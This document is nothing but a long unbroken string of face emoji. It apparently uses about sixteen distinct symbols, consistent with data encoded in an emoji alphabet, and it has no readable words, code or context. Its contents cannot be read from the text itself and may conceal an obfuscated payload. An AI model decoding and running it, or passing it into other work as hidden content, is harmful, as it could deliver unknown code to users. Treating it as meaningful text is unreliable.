🤪😝😝😃😝😂😝😇😅😃🤣😅😊😉😉😜🤣😆😆🙂🤪😝🤪😄🤪🤣😝😉😝😀🙃😅😃🙃😃🤪😝😁😅😂😅😇🤪😃🤪🤣😅😉😅😀😃😆🙃🙂🙃🤪🤣😄😝🤣😝😇🙃😃😃😅😃😉🤪😜😅😁😅🙃😃😝🙃😃🙃😂😅🤪🙂😜😂😂😀😜😜🙂🤪😂😁😀🤪😂😝😀😅🙃😀😀😆😁😇🤪😂🙂😉😀😅🙂😁😀😆🙃😀😇😁🙂😜😊😇🤣😊😃😃🙃😀😀😄🙂😅😃😀😄🤪😜😇🙂😅😃😆😉😁😂😜😁😀😊🤪😆😉😝😁😂🤣😇😀😄🙃😉😉😁🙃😇🙂😉🙃😄😉🙂😁😜🙂😀🤪🙃😂😃😜🙂😇🤪😊😅🤪😊😊😄😇😂😜😜😂😄😊😊🙂😆😂😝🤣🤣😅😜😆🙂😁😅😆🤪😃😄🙂😇😅😆🤪😝😝🤣😇😅🙂😀🤣😂😀🤪🙂😅😃🤪😁😅🙂🤪🙃😂😁😀😄🙃😃😂😁😃😄😉😝😁😜😇😃😃😜🙂😊😀🙃🙃🙂😄😂😀😁😂🤣😊😊😃😂🤣😄😊😇😀😄🤣😃🤣😇😀😉😀🙃🙂😉😀😄😅😁🙃😂🤪😇😆🙃😜😇😇😉😅😁🤪😄😂😃😂😀🙂🙃🤪😜😊🙃😇😁😄😄😊😜😜😀😂🙂😀😂🙃🤣🤣😝😄🙂😊😂😆😄😉🙂😅😅😜😁😆😄😉🤣😄😇😊😊😆😉😁😀😝😂🤣🙃😜😃🙂🙂😃😆🙃😆😄😅😊🤣😃😆😂🙃😜🤪🙂😝😃😇🤪😊😂😉😝😆😄😉😁🤣😇😄😆😃🙂😇😜😅😅😃😆😆😝🤣😅😜🤪🤪😂😝😆🤪😃😀🙃🤪😄😝😊😂😆😅🤣🙃😜😊🙂😆😃😁😉😄🙃🤣😊🙂😁🤣😃🤪😝😇😃😄🙂😁😄😀😉🙃😁🙂😇😂😃🤣😀😝😇😆😆😆😁🙃😇😀😃😅😂🤪😇🤪😅😝🤪😇😊😁😁😉😊🙂😆🙃😝😄😅🙂🤪😄🤣😁😜😁😂😂😜🤣😂😄😀🤪🙃😀😃😊😉😂😄😉😊😄😁😉😇😁😆😜😝😅😅🤣😝😄🤣😜😜😅🙂😃😀😀🙃😄😃🙂🙃🤪😄😁😉😝😁🙂😊🤣😁😄😇😂😅😁😝🤣😅😄🤪😉🤣🤪🤪😉🙂😄😀🤣🙂😄😃😉🙃🤪😃😉😊😁😁🤣😊😄😆😉😇🤪😆😉🤪😄🤣🤣🤪😄😂😉😜🤪😂😉😀😜🙃😊😉🤪😁😊😇😉😅🙃🤪🙂😂😂😆🤣🤪😇🤣😆😉😊😅😆😝😃🤣😀🤪😜😇🙃🤣😅😜😊😂😊😜😝🙂😃😃🙃🙃😂😄🙂😊😀🤪😉😊😝😜😃🙃🙃😅😃😝😁😅😇🤪🤣🙂😜😄😆😉😉😁🙃😇🙂🙃😉😆🤪😝🤣😂🤣😜😆🙂😅😄😅😉😅😆😃😅🤣😜😁😂😇😀😊🙃😉🙂😜😇🤪🙃😁😊🤣😂😆😆😝🙂🤣😃🙂😉😃😁😀😊😜😜😂😂🤣😂😆😃🤣🙂😇😀😄😉😊😆🤣😇🤣😅😅🤪😆😊😆🤣🤣😜😅🤣😅😄😅😉😁😁😊😝😀😁😁😝😊😂😂😜😇🙃😁😃😊😊😂🙃😊🤣😇😜😄🙂😃😃😀🤪🤣😆😝🙂🤪😝😅😝🤣😆😄😉😁🤪😊😁😁🤣😝😁😜😇😆😅😁🤪😄😊😄😆😆😉😜😀😊😂😊🙃🙂😄🙂😉😝😃😃😂😇😇🤪🙃😇😄😅😊😆😆😁🤪😄😉😄😇😂😆🙂😄😇😇😃😇😃😊😊😆😉😝🙃🤣🙂😜😂😀🤣🤣😂🤪😆😇🙃😇😊😅😃🤪😀🤣😜😆😂😜🤪🙂😄😃😃🙃😝😄🙂😊😇😁🤣😇😜😜😝🙃😇😄😁😊😄😆😃😄😅😝😄😅😁😝😀😂😇😀😀🙃🤣😄😅😀🤪😝😂🤣🤣😜😅🙂😆😃😁😉😄😅😝😀😀🤪😅🤪😇🤣😝😜😇🙂😊🤣😂😝😂😝😂😆😇😊🤣😃😀😅😜🤣😄😝😅😆😃🙃😇😝😜😁😆🙂😃🤪😜🙂😃😀😉🙃🙃😄🙂😀😆😂😇😇😂😄😜😂😊😝😇😝🙂😉🤣😄😜😊🤪😆😝😇😁😄😄😃🙃😝😂😆🙂😜🙃😄🤪😀😁😅😆🤪😁😂😄😁😄😉😀😀🤣😂😆🤪😃😆🤪😊😜😄😉🙃😄😜😝🤣😆😇😆😁😝😉😝😃😉🙂🙃🤪🤪🤣😆😇😝😁😆😉😀😀😇😂🤪🤪😀😆😀😇😀😁😀🙃😆😜🤪🤣🤪😝😊😆😉😊😀😃🤪🙂😊😜😀😅😀😇😝😁😆🙃😆😃😀😂🙂😝🙂😅😆😊😇😃😇🙃🙂😀😀🤣😀😝😝😆😆😉😆😄😀🙂🙂🤪🙂🤣😆😇😇😄😇😉🙂😃😀😂😀🤪😝😉🤣😁🙂😇😃😅😀😝😜😃😂😀🤣😆😉😇😅🤣😇😀🙂😊😜😅😂🤪🤣😂😅😀😆🙃😁😄😄😊🙃🙂😀🤣😅😂😃🤪😝😂😇😀😊🤪😂😅🤣😉🙂😜😝😅😝😅😝😝😝😅😆😉😊😜😃😀🙂😉🙂😉🙃😄😇😉🤣😜🙃😁😜🙃🤣😜😅😜🤪😝😂😅😅🤪😆😂😁😆😆😊😄😜😁😁🙂😂🤪😊😀😜😜😁🤪🙂😁😂😉😀🙂😜😂🤣😊😇😉😜😜😆😆🙃😆😃🤣😃😀🙃😜😄🤪😊😝😆😇😝😊🙃🙂😁🙃🙂😊😄😀😉🤣😁😅😇😆🙃😁😀😝🤣😀😉😄😉🤣😃🙃🙂🙃😝😜😃😜😄😃🤪😜😂🙂😀😂🙃🤣🙂😃🙂🙃😆😅😆😁🤪😊😝😄🤪😁😀🤪🙃😝😄😇😊😊😆😉😝🙃😇🤣😁😂😆😝😃😊😉😆😁😁😇😄😃😝😁😅😝😁😅😊🙂🤪🤪😆😉🤪😆😅😇🙃😅🙂🤪😂😇🙂😄😆🤣😆😉🤪😜🤣😁😇😁😜😉😝😀🤪🤣🤣🙃😝😁😃😁😄😊🙃😆🙂😝😂😉😉🤣😂😜😁🙂😁😀🤣😉😀😁😂😊😝😆😁😂😁😜😇🙂😊😃😉😃😆😊😆🤪😇😂😊😅😁🤣😝🤣🙂🙃🤣😄😃😊😀😁😜😃🤣😇😄😆😝😝😜😀😃🙃🙃😄🙂😊😂😆🤣😝😅🤪😆😁😆😇😄😂🤣😉😅😄😜😊🤪😆😝😁😃🙂🤣😝🙃😄😀🤣😄😀😇😁😇😇😅😅😆🤪😁😅🤣🙂😂😂😆😊😃😉😄😁😄🤣😄🤣😜🤪😉😂🙃😀🙂🤪😉🙂😊😄🙃🙃😆😆😅😇😊😅🤪🤪😃🙂😃😃😂😂😝😃😝😊😝😆🤪😉😇😁🤪😜🙃😂😂😃😄🙃🙃😇🤣😅🤪🤪😃😂😀😜😜🤪😀🙂😀😜🙂🙂😄😀😅😁😇😜😁🙃😃😇😅😂😝😃🤪🙃😁😝🙂😝😂🤣😀🤪😜😂🤪🤣😇😃😂😀🤣😀😀😉😀😁😃😜😇😜🤣🙂😅😃😆😉😁😁😄😇😃😂🙂😃😜😀😁😜😝🙂😇😃😊😉😉😁🙃😆🙂😉😅😄🤣😝😉😀😉🙃😁😄😄😊😃😜🙃😅🤪😆😀😂🤪😃😇😇😝😁😀😄😜😊🙂😆😂😝🤣😆😂😄🤪😆😂😝😁🙂😁😀🙃😊😂😅😆😝😝🤣😇😜😊😜😀😜🙃😃🤣😅😁😁😀🤪😆🤪😂😂🙃😀😄🙃😃😄😀😀🤣😉😂😁😊😇😀😅😉😜😃🙃😜😉😊😄😂😊🤣😆😅😄😅🙃😆😝🙃😝😂😅😉😊😂😀😆😅😁🙃🙂🙃😜😃🤪😂😜😇😇😃😆🤣😂😉😊😜😇😆😝🙃😄😀😂😁🤪🙂😜😃🤪😉😝🤣🤪😝😁😁😊🙃😅😜🤪🤣🙂😇😇😁😀🙂🤪😜😄😆😜😉😂😃🙂🙂😁🤪😁😆😅😊😆😃😆😂😁😝😂😁😊😉😁😀🙃🤣😁😊😊😁😀🙃😅😜😜🤣😀😊😝😄😅🙃😀😜😆😅😁😊😂😃😁🤣😊🤪😀😁😜🙃😂😀😊🤣😊😇😁😁😂🙃😂🤪😜🤣😁😇😁😃😊🙃😀🤪😜😆😂😊😊😃😊😂😁🤪😂😆😂🙃😜😃😁😂😁😇😊😆😀😃😄😂😁😜😇🙂😊😃😉🙃😜😅🤪🤪😅😂🤣🙂😆😃😂😁🤣🙃😄😄😃😊😀😁😜😇🤪😝😝😁😂😊😊🙃😜🙃🙃😄🙂😊😂😆🤣😝😅🤣😆😀😊😇😄😃😁😉😀😄😜😊🤪😆😝😝😇🤣😊😜😉🙂🙃😆😇😉😜😁🤣😇😅😅😆😆😅😝😊😂😅😊🤪🙂😃😄🤣😉😇😁🤪😜😀🤪😉😂🙃😀🙂🙃😂😄🤣😊😅🙂😄😃😁😇😂😜😂🙂😀😀😜🙃🤪😜😉🤣😁😄🤣😉😅😜😆😃🤪🙂😉😃😇😉😅😁😆😇😁😊😇😇😇😅😁😊😂😝😉😊😀🤪😀😆🙂😇😉😅🙃🤪🙂😇🙃😀🙃😆😃😂😃🤣😅🤪😁😇😄😄😁😂😊😉😇😝😀😀😅😆😄🤪🤪😅😂😝🙂🤣😂😜🤣😝🤣😆😀🙂😅🤪😀😃😝😄😇😇😅😊😜😁😊😉🤪😜😉😁🙃🙂🙃🤪😃😃🤪🤪😇😂😅😀😆🙃😁😜😂😇😀😃😉😇🙃😄😊😅😁🤪😃😃😄🙃😉😄🙃😊🙂🙃😄😁😊😝🤪😁😂😜😄😂🤣😀🤣😜😂😇😄😆🤪😝😝🤣😇😆😄🤪😜🙂😝😀😝😆😃😇🤣😅😅🤪😆😊😉🤣😂😀😅😂😁😃😆😊😀😆😁😇😅😆🤪😝😜🤣🤪😉🙂😄😂😊🤣😆😅😃🙃😇😂😅😄😝😝😅😇🤪🤪😂😂😊😄🙂🤣😊😊😂😄😄😀😉😂😄😃😉😇😁😜😜🙂😅🙂🤪😄😂😃😀😀🤪😆🤣😄😃🤣😉🙃😜😝😅😄😄😉😂🙂😀😂🙃🤣😅😃🙃😆😇😉😀😂😆😀😂🙃😊🤣😜🙂😄😝🤣🙃😉😊😝🙃😀🙂😅😀🙃😆😇😂😀🙂😆😃😂😜😊🤪😜🤣😄😜🤣🙃😉😂😝🙂😀😂😅😁🙂🤪😝😀😀😅😆😄😂😂😊😊😜😄😁😀🤣🙂🙃😇😇😊😃🤣😆😝😂😇😇😂😜🤪😄😝😂🙃😉😜😝🤪😄🙃🤣😀🙂😜😝😊😃😃😆😀🙂🙂😇🤣😜😝😄😇😂😆😊😁🤪🙃😃🙂🤣😁🙃😉😇🙃😃😆😂😂😀🙃🙃😄😄😃😊😀🙃😂😁😊😀😄😇😊🤣😇🙃😀😇😝😄🤪😊😂😆🤣😝😅🙂😇😅😊😜😃🤪😂😂😄😅😉😄😁😅😁😝😇🤣😊😜😉😅🙃😉😇🙂😄😊😁🙂😇😂😆😉😉😂😜😀😃🙃😀😃😜😀😀🙂😂😀🤣😂😝😊🙂😂😝😉😁😆😊🤪😉🤣😄😇😝😆🙃😇😝😄😅🙂😝😀😜🙃🤪😄😝😜😇😅😜🙃😁😊😉😜🤣😃🤣😅😅😁🙃🙂🤪🤪🙃😃🤪😆😄😂🤪🤣😆🙃🤣😃😝😉😇😁😊😀😉😊😂😁😝😊😄😜🤣🙂😉😀😜🙃😆😆😅😝🙃🤣😀🤪😜😂🤪😅😅😊😃🤪😇😃🙃😅🤪🙂😝😝😃😀😃😃😊😄😆😉😁😁😄😇😃🙃😀😃😇😂😅😊😊😃🤣😂😆🙂😅😃😄🙂🤣🙃😀😃🙃🙂🤪😝😇😆😝🙃😄😜🙂😝🤣🤪😃😅🤪🤪😝😂😇😅😝😝😉😆😁😆😉😝😂😆😊😊😝😃🤪🤣😜😝😇😜😃🙃😝😉😉😁🤪😊😜😃🙂😂😁😇😝😆😝😉🤪😁😂😇🤣😅😅😅😊😇😁😀😃🤣🤪😜😊🤪😜😂😄😝😂😅😇🤪😊😂😉😆😜😀😃🙃🙃😃😊🙃🙂😁🙃😝😅🤣🙂🤪🤣🙂😄😁😅😁😆😊😝😆😇😝😊😆😁😃🤪😂😊🙂😜😃😉😂😇😄🙃🤣😂🤪😄😂😃😀😀😝🤪😄😇😅😊🙃🙂🙂😜🤪😇😁😇😄😃😂😂😝😂😀😇😜😅😅🤪😊😃😝😝😃😂😆🙃😂🙂😊😇😜😀😅😃😅🤣😝🙃🤣🙂😜😂😝😄🤣🙂😜😀😂😀😊😆🙂😄😊😃😅🤣😀😃🙂🤣😜😉🙂🤣😝😀😇😜😅🙂🤪😂😂🤣😅🙂😀😀🙂😇😃🤣😉🤣😆😄🤣😄😜😆😂😝😀😇🙃😊🤪🤪😇😇😆😇😝🙂😜🙂🙂😜😃😉😃🙂😉😄😁😃😇😀🙃😄😆😉😝😇😂😁😜🙃😂😜😉😜😁🙂😇😂😅🤣😁😂😝🙃😂😀😀😃🙃😅😃😅😂😁🤪😆😅😝🤪😇😂😊😅😉😀😊🙃😂😄😊😉😊😁🙂😝🙂😅🙂🤪🤣😁😃😃😂🙃🙂😁😄😊😅😜😇😊🙂🤣🙃😜🙂🙂🤣😜😉🙃😊😄🙂😅😂🤪🙃😂😄😀😃🙃😀😊😝😝😅🙃😄😝😉😅🤣😀🤣😂😇😃😁🙃😂😄🤣😊😅🙂🤣😄😊😇😆😆😇😇😊😆😊🙂😝😁😂😝😇🤣🙂🤪🤪😇🤪😜🤪🙂😂😃🤣😉😅😆😂🙃😝😃😇😉😀😜😊😅😄🙂🤣😄😁😉😇😁😊😇😉🤪🤪😜🤪😀😀🤣😂😊😆🙂😀😉😉😆😄😝😃🤣😀🤪😜😂🤪😀😝🤪😅🤣😊😊😃😆🙃😝🙂🤣😂😜🤣🙂😅🙃😆😜🙂😂😄😜😅🤣😀😝😜🤣🤪😜😝😝😂😆😊😉😆😉😊😃😆🙂🤪😝😅🤪😄😅😉😝🤣😃🤣😂🤣😊😜😃😃😅😇😊😝😂😜😀😜🙃😉😄🙃😊🙂😉🤪😁😂😝😄😅🙃😆😉😃🙂😉😃😁😀😊😜😂😝😆😅😀😝🙂😅😆😉🤣🤪😁😝😁😂😇🤣😅😅🤪😆😂😁😀😄😇😝🤣😀😂🤣😆😆😇😝😅😇🤪😊😅🤪😃🤪😄🙂🙂😉😁😝😄😀😝😂🤣😊😜😄🙂😃😃😀😜😄🙃😁😁😃🙃😜😁🤪😝🙃🤣😊🤪😝😃😉😉😇😁😅😇😆😅😁😊😆🤣😀🤣🤪🤪😃🤪😂🤪🙃😁😜😝😆😅😉🤪🙃😂🙂😆😂😊😆🤪😇😄😀😃😂🤣🙃😊😝😀😂😁😊😉😆😉😁😄😇😊😊😆😉😅😇😝😜😉🤪😀😀😄😄😁😊😜😉😇🙂😅😃🤪😀🤣😜🙃😀😁🤪🙃😁😃😝😇😄😇😆😃😜🤪😝😂🤣😀😅🙃😆😊😁😃😅😉😝😊🤣😝😝😆🙂😊😃😃😄🙃😊😄😉😊🙃😇🙃🙂😆😆😉😆😝😊😜😆😃🤣🙃😁😂😇😀😆😜😝🤪😂😁😊😄😜😆😝😁😃🤪😉😅😇😉😅😇🤪😅😂😆😀😁😂🙃🤪😁😇😜😇😇🙂😂🤪😜😊😁🙂😃😀😉🙃🙃😄🙂🤪😀🙂😅😂🤣😇😊😁😊🙃🤪😂🤣😉🤣😄😜😊🤪😆😝🤣😝😅😇😜😄😊😆😇😀🙃🤪😇😇😝😆😅😆🤪😁😂😄😅😁🤪🤪😂😅😀😀🙂😂😀😀🙂😝😝😃😉😁😝🤣🙂🤪😁😃😉😉😁😁😇😂😄🙃😜😂🙂😀😀😜🙃🤪🙂😃😄😊😊😄😆😃😝😅😅😝😊😊😃😇😉😅😁😆😇😁😝😃😇🙃🙂😆😝😊😃😊🙂😅🤪😀😆😄😇😉😅🙃🤪🙂😇🙃😃😊😆😉😂😄😉😅🤪😀😀😜😇😅😜🙂😂🤪😀😝🙃😇🙂😃😇😉😃😆😅😄🙃🙃😝😅😀🙃😆🙂🙂🤣😜🙃😝😀😅😀😝😜🤣🤪😆😜😝😉🤣😁🤪🙂🤣😄😇🤪😅😁🙂🤪😅😂🙂😃😄😃😇😂😆😂😊🤣😁😝😄😅😜😇😂😇😀😊🙃😉🤣😝😝🤣😜😝😁🤪😂😃😊🙂😉😊😁😃😃🙂🙂😃🤪😃😃😉😆🤣🙂😁😇🙂😊🤪😄😂😉🙂😁😂😇🤣😉😝😝😄😆😇😉🙂😀😆😅🤪🙃😜😉😊😄🙂🙃😄🤪😇😁🤣🙃😆😝🙃🙂😇😊😇😆😅😝😆🤣😁😅😆😉🤪😊🙂😁😃😀😇😊😄🙂😀🤪🤣🤣😉😜🙃🙂🙂🤣🙃😜😃😅😃😇😝🤪😉😂😝😃😀😂😄🤪😊😅🙂😊🙃😁😁😇😊😅😉🤪🙃😂🙂😀😂😃🤣😂😆😜😆😂😂😃😄🤣😃😜😀😂😜😆😃😉😆😀🙃🤣😆😇🙃😄😜🙃😅😜😄😅🤣😊🙃😃😂🤣🤪😝🤪😆😝😉😅😃😄😂😄😝😀😁😁🙃😂😜😇🤣😁😇😄😃🤪😂😅😜😀😅😁😊😁😀😜😂😝😝😜😆😀😉😅😀😂🤣😉😇😄😃🙃🙂😇🤪😊😆😄😊😅😃😆🤣😊😝😜😁😝🙃😆😀😂🤣🤣😊😝😁😃🙂😜🤪🤣😅🤣😊😇😃😊😂😄🤪😄😆🙃😉😂😜🤪😂😃😝😀😄😂🙃😉😀😄🤣😂🤪😇😂😊😀😉🤪😊😂😄😝😃😆🤪😊🤪😃😝🙂🤪😜😀🤣😝😝🤣😄😂😇😇😆😝😝😇🤣😊😁😇😇🤪😆😊😊🤪😄😅🙂🤪😜😉😂😂🙃🙃😄😇😇😅😁🙂🙃😉😃😆🙃😁🤣😃🤪😉😂🙃😀🙂😜🙂😉🤪😂😝😆🤪🙃😇😊😁😅🤣🙂😊😀😜🙃🤪😄😝😀😜🤣😉😉🤪😊😀😃😇🙃🤣😝😅😀😝🤣😃😉😝🤪🤣😆🤣😂😝😜😜🙂🤪😃😝😜😜😅😊🙂😜😇😀😀🙃😁😁😄😝🙃😉🤪😆😄😇🤣😀🙃🙃🤪😃😊🤣🙂😆😀😝🙃😇😄😊😁😊😁😀😃😝🙂🙂😄😂😂😀😃😂🤪😁😁😄😇😃😅😀😀😊😂😉🤪😄😆😆😊😀😃🤣😂🤪🤪🤣😆🤪😊😉😄😆🙂😄😝🤪😅😁😇🤣😄🙂🙂😇😜🙃🤣😁😇🤣😄🤪🙃🤣😀😆🤣😂😇😉😄🤣🙃😜😀🤣😂😀😝😝😁😇😉🙃😃😂😂😜🤪😂😆😄🙃🤪😃😁😂😜🤪😄😁🤪😊🤣😃😉😂🤣🤪🤪😅😄😉🤪😄🤣🙂😉🤪🤣😅😜😇😄😃🤪🙃🤣😜😉😅🤣😇🤪😁😄🙂🤪😀🤣🤣😉😇🤣😁😊😉😂😀😆😁😆😊😝😆😇😝😊😅😜😉😇😇😄😁😆🙃😝😃😊😜😂😅😁🤪😄😂😃😀😀🙂😜😃🤪😀😆😂😇😇😁😅😝🤪🙃😂🙂😀😂😝😂😂😅😜😝😀😉😝🙂🤣😃😜😀😂😜😊😀🙃😉🙂🤣😀🙂😇😇😅😄🤣😊😜😝🙂🤣😃😅😉😆😀🤣😁🤣😀😊😝😝😉😄🤪😂🙃😀😅😇😉😊😁😉😇🙃🙂😆😝😅😄😄🤣😊😊😃😀😄😆😉🙃😂🤪😀😁😃😂😇😊😇😜😊😅😁😉😄😜😄😆😀🙂😀😝😅😃😝🤣😁😉🤪😜🙃😆😉🙂😊😇😉😄🙂😂😄😊🙃😀🤪😅😂🙃😜😜😀😁😉🙂😆😇😆😀😁😅😊😉😉😜😀😄😜🙂😉😝😃😃😀🤣😊😊😄😜😃😆😇🙃😁😝😄😄🤪😂😆😊😁😀🤪😅😅🙃😆🤪😜😁🤣😂😅😝😀😃😂😅🤣😉🤪😜😝😂😝🤪😆😁🤣😇😅😅😆😀😜😆😊🙂😃😊😉🤪🤣😃🙃😅🤣🙂😉😇😄😜😃😄😀😆🙃🙃😂😇😂😜🤣😁😄🤣🙃🙃😉😝😅😀🙃😁😜😂😆🙃😇😇😅😀😊😆😀😂😅😊😃🤪😅😃😃😆😇🙂😆😊😆🤪🤪😃🙂😆😃🙂😂😊😂🤪😀😄😅😅🤣😂😜😇😆😜😅😃🤪🤣😁🙃😆😊😝😀😁😁😁😅😇😉😃😝😄😜😊😆😀😂😃🙃😉😝😜😃😀😁🙃😂😜😊😝🙃😀😃😆😉😁😁😄😀😝😊😜😆😄😇😜🤣🙃😝😇🙂😂😀😊😊😄😄😝😇🙃😝🤪😂😂😀😆🙃😁😄😄😄🤣😉🙃🙃🤣🤣😊🤪😝😂😇😀😊😜😊🙃🙃😄😃😂🤣😆😝😇😉😅🤣🤪😊🙂😃😃😀🙃😊😁😄😂😝😝😅😂🤪😜😊🙂😉😃🙃🤪😉😄🤪🤣😁🙃🙃🙃😊😃😄😅🤪😁😉😇😂🤪🙃😄😂😅😇🙃😇😂😊😇😅😜😄😄🙂😅😜😂😝😆😉😝😆🤣😁😜😄😇😃🤣🙃😝😁😅😁😊😝😊😃🤪😃🤣😉😜🙃🙂🙂😆😜😂😄😅😜😁😃😆😁😝😃😀😂😀🙃🙂😜😃🤪😉😝🙂😜😀😆🤣😜😇😇😁😊🙃🤪😀😅🤣😊😇🤪😀😉😝🙂🤣😃😜😀😂😜😝😇😀😜😄🙂😄😜😆😝😄😇😇😝😜😝🙂🤣😃😅😉😆🤣😅😄😊😉😅🤣🤣🤪🙃🤪😀😄😁😅😉😉😊😁😉😇🙃🙂😉🤪😂😆😉🙃😜😀😁😅🤪😊🤪😃🙃😂🙃😝😉😄😜🙂😃🤪😇😅😃😉😊😀😂😂😀😇😉😄😁🙂😃😝😜😆😅🙃😜😜😅😆😂😊🤣😃😅😂🙃😝😆😄😊🙂🤪🤪😇😆😇😉😅😀😊😅😝😉😜😃🤪😂😂😇🙃😁😂🙃😃🤪😁😅😃😉😊😜😝🤣😊😇😅😃😂🙂🤣😝😜😁😃🙃😜😜🙃😆😊😊🙃😃😁🤣😅😝😁😄😝😂😜🤪🤪🙃😀😇😂😃🙂😉😂😁🤣😜😂😆😄🙂😊😝😁😄🤣🤣😇😊🙃😀😄😆🤪😉😀😝🤪😃😝😂😅😇😂😀🤪😅😂😉😝🤪😜😁😉🙂😅😝😀😄😆🤣🙂😉😝🤪😇😆🙂🙃😆🤪😅😄😝😂😃😇😃😀😇😅🙃😉😁🤪😜😁😃😂😀😇😇😃😄😅😃😉😇😜😁😁😄🙂😝😝😆😃😁🤣🤪😊😅😜😆😅😀🙃🤣😝😅😁😀😂😂😊🤣😃😃😅🙂🙃😂😜😄😁🙃😂🙂😝😆😜😝😜😇🙂😅😃😆😉😁😃😁😂😁😂🙃😜🙃😃😀🙂😊😄😄😄😅😉😉😁🙃😇🙂😉😃😅🙃🤪😆😂😄😝😂🙂😂😃😆😉😜😁😁😇😁😅😄😊😄😀😊🙃😉😄🙃😜🙂😃😝🙂😅😜🙂😆😁😁😅😇😜😀🙃😆🙂😉😃🙃😁😃😉🤣😄😊🙃😜😆😆😂😂🙂😝😃😀🙂😅😇😆😜🤪🙃😄😁🤣🤣🤣😂😝😀😄😅🙂🙂😇😄😃😀😀😊🙃😝🤪🤣😄😇😂😂🤣🙃😜😃😆😉🙂😜🙂😃😀😊😅😇🙃🙂🤪😇😄😝😂🙃🤣😊😀😅😁🙂🙂🙂😇🙂😇🙃😅🙂😉🙃😆😂😂😜😀😀🙂😜😃🤪😜😃🤣🙂😉😆🤪😅😁😉😁😊😇😜😇😆😁😊😉🙃😜😀😄😉😂😅😇🙂😃😅😃😉🙃😝😄😇😊😊🙂😝😁😀😊🙃😁😆😇😅😁🙂😂😅😄😆😊😉😆😄😇😉😆😀😁😄🙃😄😃😇😉😊😁😉😃😊😇😃😆🤪😝🤪😂🙃😜🙃😄🙃😊😄😆😃😝😀😊😅🙃🤪😀😝😃🤣😀😉🤪😇🤪😝😆😇😝😂🤣🤣😜😅😝🙃😄😉😂😁😊🙂😊🙂🤣😀😝🤪🤣😝😜😇😝🙂😁😜😂🙂😇🙂😀😂😅😅🙂😜🤪😄🤪😃😂😁🤣🤣😝😊😆😂🙂😇😇😆😀😝😅🤪😀😄😉😀😄🙂😊😂😆🤣😃🙃😇🙃🤣🤣😜🤣🙂😁😀😜😉🙂😅😆🙂😉😝😇🤣😊😜😉😊🤪😃😇😂😆😝🤣😁😅🙃🤣😜😁😅🙃😊😄😃😀🤣😉😊😝😄😜🙂🙃🤪😊😆😝😊😃😃😀🤣🤪😇😊😄🤣🙂😉😝🤪😁😃😉😃😀😃😅😜😇😅😃😉🙂😁😝😝😁😜🙃🙂😜😝😅😄😉😅😃😅🤣😜😇😄😁😃🙂😇😝😜😆🤪😉🙃😜😇🤣😊😇🤣😃🙃🙂🙃🤪😁😁🤣😉😅😀😀😅😁😇😄😃😝😂😀😝😜😁😉🙂😝😜😝🙃😜😁😃😊😉😆🙃😝🙂😃😜😀😄😄😂😁😂😃😅🙂😉😄🤣😅🙃😝😜🤣🤪😜😝😝🙂😄😆🤣😆😉😃🙂😊😜😃😁😇🙂😀😊😀😅😉😄🙂😊😃😆😀😇😜😃😂🙂😉😄😇🙃😉😃😂😀🤣😊😊😆😝😝🤣🤣😅😜😆😂😄😁😅😆😂😊🤪😜😇🙃🤣😝😅😂😀😜😊🙂😉😃🙃😜😄😉😉😁😅😇😁😃🙂🙂🤣😀😄🙃😃😄😀😜🤪😂😅😇😅😁🙂😂😜🤪😂😜😀😂😜😜😅😀😃😂😝😀😊🤣🤣😉🤪😀😊🤣😊😂🤪😀😝🙂😁🙂😀😃😂🤣😉😜🙃🙂🙂😆😂😇😝😅😉😝🤣🤣😆🤪😅🤣😝😜😃😂😜😜🙂😂😄😀😜🙂😇😃😝🙃🤪😄🙃😉😜😁😆😊🙂😁😇😇😆😆😀😊😉😅😅😝😝🤣😀🤪😀🤣😇😜😃😂😉😜😊🙂😅😀😝🙂🙂😀😄🙃🙃😃😉🙃😆😄😉😉😇😄🤣😊😇😁🤪😊🙂😆🤪😝😀😆😉🤪😃🤣😄😝😇😂😄😜😆🤣🤪😀😆🙂🤣😀😀🙃🤣😃🙂🙃😄😄🙃🤣😃😄😉😊🙃😆🙂😝😂🤣🤣😜😅😝😁😅😁😉😅😁😅😇😀😆😜😝🤪😊😝😅😝😜😝🙂🤪😉😇😁🤪😇😂😅🤣🤪😅🙂🙂😆😁😜😂🤪😂😜😁😀😀😝😃🤣😁🤪😇😂😊😀😉😁🙃😅😊😇🙂😉🤣🙃🙂😄😆🤪😊🙂🙂😃😃😉😀😄😜😜😜😀😀😇😃🙃🤣😜😇😉🤪😃😊😊😀😁🤣😇😅😅😆😅😉😝😁🤣😝😜😊🙃😄😃🤪😉😄😁😃😊😜😊😃😂😜😀🙂🙃😂😄🤣😆🤪😜😉🙃😅😇😇😂😁🤣😆😂😆😉😃😄😝😊😇😆😊😃😜😊😇😆🙂🤪😇😅😁😉😅😁😆😇😁🙂😄😜😜🙂😃😜😁😂🙃🤪🤪🤣😇🤪😂🤣😃😝😜😅😅😇😅😅😅😇😊😆😉😇🙃😆😉😇🤣😁😜😊🙂😁😆😊😅😄😅🙃😅😄🤣🙃😜😄😄🙃😁😃😁🙃😀😀😜🙂😅😀😁🙂😀😜😅🤣😅😜😄🤣🙃😝🙃🤣😅😝😝😆😝😝🙃😅😃😇😃😆😝😇😅😁😅😇😄😁🙃😉🙃😁😅😉😝😃😝😉🙃😄😃🙃😃😃😝🙃😅😀😅🙃😄😜😊😜😉🙂😁😃😄😉😃😜😅😇😊😝😜🤪😜😆🙂😃😆🤪😜😃😜😉🙂😁😂😇🤣😜😊🤪🙃😊😄🙃😝😇😃😂😂😂🤣😆🙂😇😝😅😇🤪😊😝🙂😅🤣🤪😁😅😆😝🤪😅😆😝😀😆😇😝😅😅😁😂😅😉😂😄🤪😊😝😆😇😄😝🙂😅😝😉😄😀😅😊😉🤣🤪😅😁😂🤪🙃🤪🙂😂😃😀😀🙂😜😉😁😁😁😊😁😁😝😁😅😜😉😂😊😀😉🙃🤣😄😅😊😆😉😆😆😄😇😉🤪🙂🙂😄😀🤪🙃😝😄😇😀😂😉😜😆😀😄😜😀😆🙂🤣😃😅😉😆🙂😅😝🤣😜😜😆😆😄😉🙂🤣🤪🙂😃😅😆🙃🙂😃😊😄😜🙃😄😝😉😉😀😊🙃😆😄😁😊😄🙃😃😇😉😜😃😇🙂😃😉🤪😁🤣😄😁😀😊🙃😆🙂😝😂😜😉😃😂🙂😄😂😝😝😜😅😄😇😄😆😜😝🤪🤣😝😜😇🙂😊😃😉😜😜😂🙂😅😝🤣😂🤪😅😂😆😀😁😝😄🙂😂😀😉😂😊😃😀🙃😁😀😇🙂😂😃😂😅😁😄😄😅😄😜🤣😉😉😄🙂😉😝😁😁😉😂😉😜😄😜😊🤪😆😝😄🤪🙂😅😝😉😄😊😂😃😉🙃😜😉😀😃